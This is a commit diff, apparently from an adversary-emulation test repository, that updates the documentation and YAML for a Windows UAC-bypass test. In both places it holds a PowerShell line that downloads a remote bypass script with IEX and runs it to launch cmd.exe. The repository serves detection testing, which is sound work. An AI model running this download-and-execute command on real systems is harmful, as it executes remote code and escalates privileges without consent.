Generate docs from job=validate_atomics_generate_docs branch=master
This commit is contained in:
parent
fe943551bd
commit
421b5c56a3
@@ -114,8 +114,7 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass"
|
||||
C:\Windows\System32\cmd.exe
|
||||
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
+4
-3
@@ -16699,9 +16699,10 @@ execution:
|
||||
- windows
|
||||
executor:
|
||||
name: command_prompt
|
||||
command: |
|
||||
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass"
|
||||
C:\Windows\System32\cmd.exe
|
||||
command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'');
|
||||
Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''"
|
||||
|
||||
'
|
||||
- name: PowerShell Add User
|
||||
description: 'Using PS 5.1, add a user via CLI
|
||||
|
||||
|
||||
Reference in New Issue
Block a user